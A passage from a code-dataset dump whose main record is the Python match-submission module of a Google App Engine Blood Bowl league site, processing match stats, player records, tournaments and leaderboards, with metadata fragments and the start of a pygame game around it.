"numpy.random.randint", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 201, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 201, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 205, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 205, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.subtract", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.add", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.gradients", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 218, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 264, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}, {"api_name": "model.conv_net", "line_number": 274, "usage_type": "argument"}]} +{"seq_id": "41213090574", "text": "\nfrom google.appengine.api.labs import taskqueue\nfrom google.appengine.api import mail\nfrom google.appengine.ext import db\nimport re, logging, random, datetime\n\nfrom models import *\nfrom grappl.utils import batch_put\nimport views, misc\n\n\ndef prepare_submit(data, handler=None, localtest=False):\n\n def read_and_delete(key):\n ret = data.get(key)\n if ret:\n del data[key]\n return ret\n else:\n return \"\"\n\n signature = read_and_delete(\"signature\")\n md5 = read_and_delete(\"md5\")\n disconnect = bool(read_and_delete(\"disconnect\"))\n bblog = read_and_delete(\"bblog\")\n\n # get team entities\n team_names = [data[\"home_name\"], data[\"away_name\"]]\n teams = [Team.get_or_insert(name) for name in team_names]\n\n # this is our match lookup aid\n match_lookup = MatchLookup.get_or_insert(MatchLookup.get_key_name(teams))\n logging.debug(\"looked up %s\" % match_lookup.get_string())\n\n # There is a race condition here. We need to refetch the last\n # match inside a transaction before we create the new match.\n def get_or_create_match():\n previous_matches = Match.all().ancestor(\n match_lookup).order(\"-created\").fetch(1)\n\n if previous_matches:\n last_match = previous_matches[0]\n last_md5 = SubmitData.all().ancestor(last_match).get().md5\n else:\n last_match = None\n last_md5 = None\n\n # Create the match if any of the following are true:\n # * their is no prior match on record between these two teams\n # * the MD5 hashes of this submit and the submit of the last match don't\n # match up\n if not last_match or last_md5 != md5:\n match = Match(parent = match_lookup, disconnect = disconnect)\n match.put()\n created = True\n else:\n match = last_match\n match.both_submitted = True\n match.put()\n created = False\n\n submit_data = SubmitData(\n key_name = signature,\n parent = match,\n disconnect = disconnect,\n md5 = md5,\n data = data,\n bblog = bblog)\n submit_data.put()\n\n return (match, submit_data, created)\n\n logging.debug(\"calling get_or_create_match for %s\" % match_lookup.get_string())\n match, submit_data, created = db.run_in_transaction(get_or_create_match)\n\n if created:\n try:\n # if we created the match, we will initiate processing\n logging.debug(\"match %s created\" % match_lookup.get_string())\n\n if localtest:\n # dev_appserver has no support for tasks so we do it manually\n process_submit(submit_data, localtest=localtest)\n \n else:\n logging.debug(\"match %s updated; spawning submit task\" %\n match_lookup.get_string())\n\n taskqueue.add(url=\"/grappl/tasks/submit\", params={\n 'submit_data_key_string': submit_data.key(),\n })\n\n # if we receive an exception delete the match to allow a retry\n except:\n match.delete()\n submit_data.delete()\n raise\n\n else:\n # check to make sure everything is consistent\n submit_data2 = SubmitData.all().ancestor(\n match).filter(\"__key__ !=\", submit_data.key()).fetch(1)[0]\n\n my_data = submit_data.data\n their_data = submit_data2.data\n\n assert_log = misc.AssertLog(match_lookup.get_string())\n for key in my_data.keys():\n assert_log.check(my_data[key], their_data[key], \"my %s\" % key)\n\n for key in their_data.keys():\n assert_log.check(their_data[key], my_data[key], \"their %s\" % key)\n\n if assert_log.mail():\n logging.warning(\"%s verification failed.\" % match_lookup.get_string())\n\n\ndef process_submit(submit_data, localtest=False):\n \"\"\"Submit the match.\n \n Ideally we want this whole post to be a transaction, but it would require us\n to lock the whole datastore which is not GAE-like. We can take advantage of\n memcache to ensure that the updates won't become visible to the web page\n until we're done and we clear out the relevant memcache entries.\n\n Still, we want to not commit the match record entries (TeamRecord and\n PlayerRecord) until the last possible moment to make the possibility of a\n parallel memcache clear presenting an inconsistent view to the users view\n maximally unlikely.\"\"\"\n\n data = submit_data.data\n match = submit_data.parent()\n match_lookup = match.parent()\n\n assert_log = misc.AssertLog(match_lookup.get_string())\n\n # First extract the information into the right categories:\n # team data,\n # team record data,\n # team player data, and\n # team player record data\n #--------------------------------------------------------------------#\n\n both_team_data = ({}, {})\n both_players_data = ({}, {})\n\n both_team_record_data = ({}, {})\n both_player_records_data = ({}, {})\n\n def str_getter(val): return val # do not use str() in case of unicode\n def int_getter(val): return int(val)\n def bool_getter(val):\n if val:\n return True\n else:\n return False\n\n # ReferenceProperties\n def position_getter(val): return db.Key.from_path(\"Position\", val)\n def race_getter(val): return db.Key.from_path(\"Race\", val)\n\n def skills_getter(val): \n skills = []\n for skill_name in [s.strip() for s in val.split(\",\")]:\n if skill_name:\n skills.append(db.Key.from_path(\"Skill\", skill_name))\n return skills\n\n def injuries_getter(val): \n injuries = []\n for injury_name in [s.strip() for s in val.split(\",\")]:\n if injury_name:\n injuries.append(db.Key.from_path(\"Injury\", injury_name))\n return injuries\n\n team_attr_map = {\n # fixed\n \"name\": (True, str_getter),\n \"race\": (True, race_getter),\n \"logo\": (True, str_getter),\n \"color\": (True, int_getter),\n\n # profile\n \"cash\": (False, int_getter),\n \"ff\": (False, int_getter),\n \"rerolls\": (False, int_getter),\n \"apoths\": (False, int_getter),\n \"cheers\": (False, int_getter),\n \"coaches\": (False, int_getter),\n\n # stats\n \"result\": (False, int_getter),\n \"tv_for\": (False, int_getter),\n \"tv_against\": (False, int_getter),\n }\n\n player_attr_map = {\n # fixed\n \"number\": (True, int_getter),\n \"bb_id\": (True, int_getter),\n \"position\": (True, position_getter),\n \"name\": (True, str_getter),\n\n # profile\n \"mv\": (False, int_getter),\n \"st\": (False, int_getter),\n \"ag\": (False, int_getter),\n \"av\": (False, int_getter),\n \"level\": (False, int_getter),\n \"spp\": (False, int_getter),\n \"value\": (False, int_getter),\n \"skills\": (False, skills_getter),\n \"injuries\": (False, injuries_getter),\n\n # other\n \"match_injuries\": (False, injuries_getter),\n\n # stats\n \"played\": (False, int_getter),\n \"mvps\": (False, int_getter),\n \"tds_for\": (False, int_getter),\n \"passes_for\": (False, int_getter),\n \"pyards_for\": (False, int_getter),\n \"rec_for\": (False, int_getter),\n \"ryards_for\": (False, int_getter),\n \"int_for\": (False, int_getter),\n \"int_against\": (False, int_getter),\n \"tckl_for\": (False, int_getter),\n \"tckl_against\": (False, int_getter),\n \"kills_for\": (False, int_getter),\n \"kills_against\": (False, int_getter),\n \"cas_for\": (False, int_getter),\n \"cas_against\": (False, int_getter),\n \"ko_for\": (False, int_getter),\n \"ko_against\": (False, int_getter),\n \"stun_for\": (False, int_getter),\n \"stun_against\": (False, int_getter),\n \"inj_for\": (False, int_getter),\n \"inj_against\": (False, int_getter),\n }\n\n player_stat_regex = re.compile(\n r\"(?P\\w+)_(?Pp\\d+)_(?P\\w+)\")\n\n for key, value in sorted(data.items()):\n hit = player_stat_regex.match(key)\n if hit:\n # it's a player attribute\n\n def get_map(team_id, player_id, is_player_data):\n index = (0 if team_id == \"home\" else 1)\n data = (both_players_data if is_player_data else\n both_player_records_data)\n\n return data[index].setdefault(player_id, {})\n\n team_id, player_id, attr = [str(x) for x in hit.groups()]\n is_player_data, converter = player_attr_map[attr]\n map = get_map(team_id, player_id, is_player_data)\n\n else:\n # it's a team attribute\n\n def get_map(is_team_data):\n index = (0 if team_id == \"home\" else 1)\n data = (both_team_data if is_team_data else\n both_team_record_data)\n\n return data[index]\n\n team_id, attr = [str(x) for x in key.split(\"_\", 1)]\n is_team_data, converter = team_attr_map[attr]\n map = get_map(is_team_data)\n\n map[attr] = converter(value)\n\n\n # Build team aggregate statistics\n #--------------------------------------------------------------------#\n \n for which_team, team_record_data in enumerate(both_team_record_data):\n for attr in sorted(TeamStats.properties()):\n if attr.startswith(\"tv_\"):\n # these are already handled\n continue\n\n if \"for\" in attr:\n opp_attr = attr.replace(\"for\", \"against\")\n else:\n opp_attr = attr.replace(\"against\", \"for\")\n\n def compute_aggregate(which_team, attr):\n return sum([v.get(attr, 0) for v in\n both_player_records_data[which_team].values()])\n\n inputs = ((which_team, attr), (which_team ^ 1, opp_attr))\n sums = [compute_aggregate(*input) for input in inputs]\n\n if all([s != 0 for s in sums]) and not any(\n [x for x in (\"cas_\", \"kills_\", \"stun_\", \"ko_\") if x in attr]):\n assert_log.check(sums[0], sums[1], context=\"aggregate sum for %s\" % attr)\n\n # as a safety, in case we fail we take the maximum of the two\n team_record_data[attr] = max(sums)\n\n # Now build the actual models\n #--------------------------------------------------------------------#\n\n both_teams = []\n both_team_records = []\n both_players = ([], [])\n both_player_records = ([], [])\n\n for team_data in both_team_data:\n # Again, like match, we need to create (\"put\") the team if it doesn't\n # already exist. Fortunately this is an idempotent operation.\n team = Team.get_by_key_name(team_data['name'])\n team.race = team_data['race']\n team.logo = get_logo(team_data['logo'])\n team.color = get_color(team_data['color'])\n team.last_active = datetime.date.today()\n team.retired = False\n both_teams.append(team)\n\n for which_team, team_record_data in enumerate(both_team_record_data):\n team = both_teams[which_team]\n team_record_data[\"parent\"] = match\n team_record_data[\"key_name\"] = \"%s\" % which_team\n team_record_data[\"tv\"] = team_record_data[\"tv_for\"]\n team_record_data[\"disconnect\"] = submit_data.disconnect\n team_record_data[\"team\"] = team\n team_record_data[\"glicko_r\"] = team.glicko_r\n team_record_data[\"glicko_RD\"] = team.glicko_RD\n team_record_data[\"status\"] = team.status\n\n both_team_records.append(TeamRecord(**team_record_data))\n\n for which_team, players_data in enumerate(both_players_data):\n for player_key, player_data in players_data.items():\n # For the players, just like with the teams and the match, we need to\n # create (\"put\") the entities first before we can do anything with\n # them. Just like with the teams, this is an idempotent operation.\n team = both_teams[which_team]\n player_data[\"team\"] = team.key()\n player = Player.create(**player_data)\n both_players[which_team].append(player)\n\n for which_team, player_records_data in enumerate(\n both_player_records_data):\n for which_player, player_record_data in enumerate(\n player_records_data.values()):\n\n player_record_data[\"parent\"] = match\n player_record_data[\"key_name\"] = \"%s:%s\" % (which_team, which_player)\n player_record_data[\"player\"] = (\n both_players[which_team][which_player])\n player_record = PlayerRecord(**player_record_data)\n\n both_player_records[which_team].append(player_record)\n\n # Prepare to commit\n #--------------------------------------------------------------------#\n put_list = []\n\n # Update records\n for players, player_records in zip(both_players, both_player_records):\n for player, player_record in zip(players, player_records):\n put_list.append(player)\n put_list.append(player_record)\n\n for team, team_record in zip(both_teams, both_team_records):\n put_list.append(team)\n put_list.append(team_record)\n\n # Commit\n #--------------------------------------------------------------------#\n\n # Batch commit! This is as close to a transaction as we are going to get.\n logging.debug(\"preparing to commit phase 1 %s \" % match_lookup.get_string())\n batch_put(put_list)\n\n put_list = []\n # Add some last-minute links to speed things up. We couldn't do this before\n # because the entities we're linking to didn't exist in the datastore yet\n for which_team, (team, team_record) in enumerate(zip(both_teams, both_team_records)):\n team_record.opponent_record = both_team_records[which_team ^ 1]\n put_list.append(team_record)\n\n for player_record in both_player_records[which_team]:\n player_record.team_record = team_record\n put_list.append(player_record)\n\n logging.debug(\"preparing to commit phase 2 %s \" % match_lookup.get_string())\n db.put(put_list)\n\n # Done!\n logging.debug(\"submit task for %s terminating successfully\" %\n match_lookup.get_string())\n\n match.processed = True\n match.put()\n\n assert_log.mail()\n\n if localtest:\n # dev_appserver has no support for tasks so we do it manually\n process_update(match)\n else:\n logging.debug(\"spawning update task for %s\" % match_lookup.get_string())\n\n # We do this separately because otherwise we run up against the 30 second\n # limit\n taskqueue.add(url=\"/grappl/tasks/update\", params={\n 'match_key_string': match.key(),\n })\n\n\ndef process_update(match):\n match_lookup = match.parent()\n put_list = []\n\n logging.debug(\"preparing to update for %s\" % match_lookup.get_string())\n\n assert_log = misc.AssertLog(match_lookup.get_string())\n season, week = misc.get_ofl_season_and_week()\n\n # Update team information\n #--------------------------------------------------------------------#\n\n team_records = list(match.get_team_records_query())\n teams = [record.team for record in team_records]\n coach_stats_list = []\n \n for team, team_record in zip(teams, team_records):\n\n # this check is to make sure we only do this once (for idempotence) in case\n # of a retry\n if team.teamrecord_set.count() > team.matches:\n team.update(team_record)\n coach = team.coach\n if coach:\n coach.last_active = datetime.date.today()\n coach_stats = CoachStats.all().ancestor(coach).get()\n coach_stats.update(team_record)\n coach_stats_list.append(coach_stats)\n\n # OFTL eligibility rule checks\n if not team.check_eligibility(season=season):\n team.set_flag(TeamProfile.INELIGIBLE_FLAG)\n\n # retirement (not by death)\n active_player_count = 0\n player_keys = [pr.player.key() for pr in team_record.playerrecord_set]\n for player in team.player_set:\n if not player.key() in player_keys:\n if player.retired == False:\n player.retired = True\n put_list.append(player)\n\n if not player.retired:\n active_player_count += 1\n\n # boost TV for potential loners\n if active_player_count < 11:\n team.tv += (11 - active_player_count) * 50\n\n # Update player information\n #--------------------------------------------------------------------#\n\n player_records = list(match.get_player_records_query())\n players = [record.player for record in player_records]\n\n # Structure to map to the already-updated player team.\n # We use this map because 'player.team' and the same team indexed in\n # 'teams' do not point to the same object. To avoid conflict we\n # update the one in 'teams' through the map\n team_map = dict((t.key(), t) for t in teams)\n\n # Keep track of the number of players that violate the SPP check. Allow one\n # violation for journeyman hire, which is impossible to track otherwise.\n violation_set = set()\n for player, player_record in zip(players, player_records):\n if not player.team:\n # journeyman / star player\n continue\n\n if player.matches == 0 and player_record.is_empty():\n # a journeyman/necro/nurgle hire that may have acquired SPP in-game\n continue\n\n if player.team.key() not in team_map:\n assert player_record.is_empty()\n # Unfortunately BB assigns a journeyman/necro/nurgle hire an arbitrary id\n # that may conflict with an existing OFTL player from a different team.\n # In this case, player.matches != 0. This code is a safety net.\n continue\n\n # this check is to make sure we only do this once (for idempotence) in case\n # of a retry\n if player.playerrecord_set.count() > player.matches:\n\n # OFTL rule checks\n if not assert_log.check(player_record.spp, player.spp,\n \"%s %s (%s) expected spp\" % (\n player.team.key().name(), player.name, player.key().name())):\n\n # allow one violation for a journeyman hire before setting the\n # inconsistent flag\n if player.spp != 0 or (player.team.key() in violation_set):\n team_map[player.team.key()].set_flag(TeamProfile.INCONSISTENT_FLAG)\n\n violation_set.add(player.team.key())\n\n tv_delta = player.update(player_record)\n if tv_delta:\n team_map[player.team.key()].tv += tv_delta\n\n put_list.extend(coach_stats_list)\n put_list.extend(teams)\n put_list.extend(players)\n batch_put(put_list)\n\n # Update Race Statistics\n #--------------------------------------------------------------------#\n update_race_statistics(teams, team_records)\n \n # Update leader information\n #--------------------------------------------------------------------#\n\n update_coach_leaders(coach_stats_list)\n update_team_leaders(teams)\n update_player_leaders(players)\n\n # Update tournament details\n #--------------------------------------------------------------------#\n\n match_up = match_lookup.tournamentmatchup_set.get() \n\n # disqualify team if played match outside of tournament\n for team in teams:\n active_membership = team.get_active_tournament_membership()\n if active_membership and (not match_up or\n match_up.parent().key() != active_membership.parent().key()):\n\n active_tournament = active_membership.parent()\n if active_tournament.started:\n mail.send_mail(\n sender=\"verification@bb-oftl-hrd.appspotmail.com\",\n to=\"balderasfam@gmail.com\",\n subject=\"OFTL rules violation\",\n body=\"%s played outside of %s\\n\" % (\n team.key().name(), active_tournament.key().name()))\n else:\n # force withdraw\n active_membership.delete()\n\n # there can only be one tournament for this match\n if match_up:\n tournament = match_up.parent()\n\n # determine the winner\n if team_records[0].result == 0:\n # decide the winner by a 'coin flip'. Seed the random number generator by\n # the match key to make it deterministic in case we need to retry\n random.seed(str(match.key()))\n winner_index = random.choice([0, 1])\n else:\n winner_index = 0 if team_records[0].result == 1 else 1\n\n winner = teams[winner_index]\n winner = winner.tournamentmembership_set.ancestor(tournament).get()\n\n loser = teams[winner_index ^ 1]\n loser = loser.tournamentmembership_set.ancestor(tournament).get()\n\n if match_up.advance(winner, loser, match):\n update_team_leaders([winner.team])\n\n views.TournamentBox.clear(tournament.key())\n views.Tournaments.clear()\n \n # Evict relevant pages from memcache so they are regenerated\n #--------------------------------------------------------------------#\n\n for team in teams:\n views.TeamBox.clear(team.key())\n\n for player in players:\n views.PlayerBox.clear(player.key())\n\n views.RecentMatches.clear()\n views.LeagueStandings.clear()\n views.TeamLeaders.clear()\n views.PlayerLeaders.clear()\n views.CoachLeaders.clear()\n views.GeneralStatistics.clear()\n\n assert_log.mail()\n logging.debug(\"update successful for %s\" % match_lookup.get_string())\n\ndef update_race_statistics(teams, team_records):\n # If two teams of same race are playing against each other then\n # we have to run race_stats.update(team_record) twice, once for each\n # team. THEN we can queue the put.\n \n put_list = []\n\n if (teams[0].race == teams[1].race):\n race_stats = RaceStats.all().filter(\"race =\", team.race).get()\n for team, team_record in zip(teams, team_records):\n race_stats.update(team_record)\n put_list.append(race_stats)\n else:\n for team, team_record in zip(teams, team_records):\n race_stats = RaceStats.all().filter(\"race =\", team.race).get()\n race_stats.update(team_record)\n put_list.append(race_stats)\n\n batch_put(put_list)\n \ndef update_coach_leaders(coach_stats_list):\n \"\"\"Update coach leader standings\"\"\"\n put_list = []\n\n # update leader standings for each Coach\n for leader in CoachLeader.all():\n for coach_stats in coach_stats_list:\n put_list.append(CoachLeaderStanding(\n key_name = coach_stats.parent().key().name(),\n parent = leader,\n coach_stats = coach_stats,\n score = leader.get_score(coach_stats)))\n\n batch_put(put_list)\n \ndef update_team_leaders(teams):\n \"\"\"Update team leader standings\"\"\"\n put_list = []\n\n # update leader standings for each team\n for leader in TeamLeader.all():\n for team in teams:\n if team.matches == 0:\n # pre-registered team\n continue\n\n put_list.append(TeamLeaderStanding(\n key_name = team.key().name(),\n parent = leader,\n team = team,\n score = leader.get_score(team)))\n\n batch_put(put_list)\n\n\ndef update_player_leaders(players):\n \"\"\"Update player leader standings\"\"\"\n put_list = []\n\n # update leader standings for each player\n for leader in PlayerLeader.all():\n for player in players:\n if not player.key().name() or player.played == 0:\n # omit journeymen/star players and players that have not played\n continue\n\n put_list.append(PlayerLeaderStanding(\n key_name = player.key().name(),\n parent = leader,\n player = player,\n score = leader.get_score(player)))\n\n batch_put(put_list)\n\n\ndef get_color(num):\n if num>55:\n num=55\n\t\n color_map = {\n 0: (85 , 209, 255),\n 1: (112, 254, 202),\n 2: (151, 246, 14 ),\n 3: (246, 255, 0 ),\n 4: (241, 186, 138),\n 5: (255, 123, 246),\n 6: (224, 104, 254),\n 7: (223, 229, 229),\n 8: (85 , 169, 255),\n 9: (0 , 255, 252),\n 10: (0 , 255, 0 ),\n 11: (255, 222, 0 ),\n 12: (255, 147, 147),\n 13: (255, 85 , 243),\n 14: (180, 123, 255),\n 15: (192, 191, 191),\n 16: (8 , 130, 255),\n 17: (3 , 219, 216),\n 18: (107, 221, 14 ),\n 19: (239, 189, 16 ),\n 20: (255, 83 , 83 ),\n 21: (246, 0 , 229),\n 22: (158, 85 , 255),\n 23: (170, 170, 170),\n 24: (20 , 60 , 212),\n 25: (2 , 168, 166),\n 26: (95 , 200, 9 ),\n 27: (204, 117, 41 ),\n 28: (244, 0 , 0 ),\n 29: (158, 0 , 147),\n 30: (106, 0 , 246),\n 31: (109, 109, 109),\n 32: (38 , 77 , 176),\n 33: (1 , 108, 107),\n 34: (77 , 111, 3 ),\n 35: (140, 78 , 29 ),\n 36: (180, 0 , 0 ),\n 37: (90 , 0 , 84 ),\n 38: (68 , 0 , 158),\n 39: (62 , 62 , 62 ),\n 40: (37 , 61 , 121),\n 41: (1 , 78 , 64 ),\n 42: (40 , 74 , 7 ),\n 43: (90 , 55 , 25 ),\n 44: (128, 0 , 0 ),\n 45: (54 , 37 , 78 ),\n 46: (48 , 4 , 105),\n 47: (24 , 24 , 24 ),\n 48: (21 , 35 , 69 ),\n 49: (1 , 45 , 37 ),\n 50: (27 , 50 , 5 ),\n 51: (52 , 29 , 9 ),\n 52: (74 , 0 , 0 ),\n 53: (31 , 21 , 45 ),\n 54: (28 , 2 , 60 ),\n 55: (14 , 14 , 14 ),\n }\n\n def get_two_char_hex_string(val):\n s = str(hex(val))[2:4]\n if len(s) == 1:\n s = \"0\" + s\n return s\n\n return '#' + \"\".join(get_two_char_hex_string(val) for val in color_map[num])\n\n\ndef get_logo(logo):\n logo = \"logo_%s.png\" % logo.lower()\n logos = open(\"./logos.txt\")\n for line in logos:\n if line.strip() == logo:\n break\n else:\n logo = \"logo_neutre_07.png\"\n logos.close()\n return logo\n\n\n", "repo_name": "midnjerry/bb-oftl-hrd", "sub_path": "grappl/submit.py", "file_name": "submit.py", "file_ext": "py", "file_size_in_byte": 24670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.debug", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 73, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.run_in_transaction", "line_number": 74, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 74, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 79, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 86, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue.add", "line_number": 89, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue", "line_number": 89, "usage_type": "name"}, {"api_name": "misc.AssertLog", "line_number": 107, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 115, "usage_type": "call"}, {"api_name": "misc.AssertLog", "line_number": 135, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 159, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 159, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 159, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 160, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 160, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 160, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 166, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 166, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 166, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 173, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 173, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 173, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 242, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 321, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 321, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 379, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 380, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 393, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.put", "line_number": 394, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 394, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 397, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 409, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue.add", "line_number": 413, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue", "line_number": 413, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 422, "usage_type": "call"}, {"api_name": "misc.AssertLog", "line_number": 424, "usage_type": "call"}, {"api_name": "misc.get_ofl_season_and_week", "line_number": 425, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 442, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 442, "usage_type": "attribute"}, {"api_name": "grappl.utils.batch_put", "line_number": 521, "usage_type": "call"}, {"api_name": "google.appengine.api.mail.send_mail", "line_number": 547, "usage_type": "call"}, {"api_name": "google.appengine.api.mail", "line_number": 547, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 565, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 566, "usage_type": "call"}, {"api_name": "views.TournamentBox.clear", "line_number": 579, "usage_type": "call"}, {"api_name": "views.TournamentBox", "line_number": 579, "usage_type": "attribute"}, {"api_name": "views.Tournaments.clear", "line_number": 580, "usage_type": "call"}, {"api_name": "views.Tournaments", "line_number": 580, "usage_type": "attribute"}, {"api_name": "views.TeamBox.clear", "line_number": 586, "usage_type": "call"}, {"api_name": "views.TeamBox", "line_number": 586, "usage_type": "attribute"}, {"api_name": "views.PlayerBox.clear", "line_number": 589, "usage_type": "call"}, {"api_name": "views.PlayerBox", "line_number": 589, "usage_type": "attribute"}, {"api_name": "views.RecentMatches.clear", "line_number": 591, "usage_type": "call"}, {"api_name": "views.RecentMatches", "line_number": 591, "usage_type": "attribute"}, {"api_name": "views.LeagueStandings.clear", "line_number": 592, "usage_type": "call"}, {"api_name": "views.LeagueStandings", "line_number": 592, "usage_type": "attribute"}, {"api_name": "views.TeamLeaders.clear", "line_number": 593, "usage_type": "call"}, {"api_name": "views.TeamLeaders", "line_number": 593, "usage_type": "attribute"}, {"api_name": "views.PlayerLeaders.clear", "line_number": 594, "usage_type": "call"}, {"api_name": "views.PlayerLeaders", "line_number": 594, "usage_type": "attribute"}, {"api_name": "views.CoachLeaders.clear", "line_number": 595, "usage_type": "call"}, {"api_name": "views.CoachLeaders", "line_number": 595, "usage_type": "attribute"}, {"api_name": "views.GeneralStatistics.clear", "line_number": 596, "usage_type": "call"}, {"api_name": "views.GeneralStatistics", "line_number": 596, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 599, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 619, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 634, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 653, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 673, "usage_type": "call"}]} +{"seq_id": "34414766495", "text": "import pygame\nimport os,sys\nimport Player\nimport pBullet\nimport Level\npygame.init()\n\nSCREENHEIGHT = 480\nSCREENWIDTH = 640\nscreen = pygame.display.set_mode((SCREENWIDTH,SCREENHEIGHT))\npygame.display.set_caption(\"Bullets\")\npygame.key.set_repeat(100,100)\nbackground = pygame.Surface(screen.get_size())\nbackground = background.convert()\nlevels = [Level.Level(\"A8B4C4D6\",650,SCREENHEIGHT,SCREENWIDTH,1),Level.Level(\"C4A2B3D1D2D3D4D5\",1100,SCREENHEIGHT,SCREENWIDTH,2)]\nactivelevel = 0\n#player = Player.Player(310,240,30,30,(0,0,255))\n#fbullet = pygame.sprite.Group()\nlastFiring = 0\nclock = pygame.time.Clock()\nwon = False\nscore = [0]\nscorefont = pygame.font.Font(None,40)\n\ndone = False\nwhile not done:\n if pygame.event.peek():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_LSHIFT:\n levels[activelevel].player.focus(True)\n if event.key == pygame.K_UP:\n levels[activelevel].player.moveV(-6)\n if event.key == pygame.K_DOWN:\n levels[activelevel].player.moveV(6)\n if event.key == pygame.K_RIGHT:\n levels[activelevel].player.moveH(6)\n if event.key == pygame.K_LEFT:\n levels[activelevel].player.moveH(-6)\n elif event.type == pygame.KEYUP:\n if not pygame.key.get_pressed()[pygame.K_UP] and not pygame.key.get_pressed()[pygame.K_DOWN]:\n levels[activelevel].player.moveV(0)\n if not pygame.key.get_pressed()[pygame.K_RIGHT] and not 